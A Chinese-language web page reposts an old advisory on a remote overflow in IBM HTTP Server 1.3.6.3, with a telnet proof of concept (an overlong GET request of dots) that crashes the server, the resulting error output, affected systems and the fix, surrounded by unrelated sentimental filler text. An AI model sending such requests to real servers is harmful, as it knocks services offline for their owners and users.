IBM HTTP Server 远程溢出漏洞

若不得不分离,也要好好地说声“再见”,也要在心里存着一份感激,感谢你给了我那一份终身难忘的甜蜜的回忆。
涉及程序: GET 描述: 通过提交超长的GET请求导致IBM HTTP Server远程溢出详细: IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。) 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负$ telnet target 80GET /......(216个".")aaa HTTP/1.0则系统会报告下列错误信息:***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTION_NOT_HANDLED.***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe注意:目标主机运行在Windows 2000下。受影响的系统 IBM HTTP Server 1.3.6.3- TurboLinux Turbo Linux 3.0.1- Sun Solaris 2.6- S.u.S.E. Linux 6.1- S.u.S.E. Linux 6.0- RedHat Linux 6.0 sparc- RedHat Linux 5.2 sparc- Microsoft Windows NT 4.0- IBM AIX 4.2.1- Caldera OpenLinux 2.2 解决方案: IBM 已经在 1.3.12 版本中解决了此问题,下载地址:http://www-4.ibm.com/software/webservers/httpservers/download.html

以上就是IBM HTTP Server 远程溢出漏洞。这个时代传奇的男女,必要经历许多分分合合,辜负过很多人、也被很多人辜负过,然后在世人的议论纷纷中永垂不朽。扛得住诋毁,才担得起成功。经得起流言,才写得出传奇。更多关于IBM HTTP Server 远程溢出漏洞请关注haodaima.com其它相关文章!

您可能有感兴趣的文章
IBM WebSphere源代码暴露漏洞

详解http请求中的Content-Type

Http请求长时间等待无结果返回如何解决办法

HttpClient Post 二进制/字节流/byte[]实例代码

javascriptp 中HttpClient中的POST方法实例详解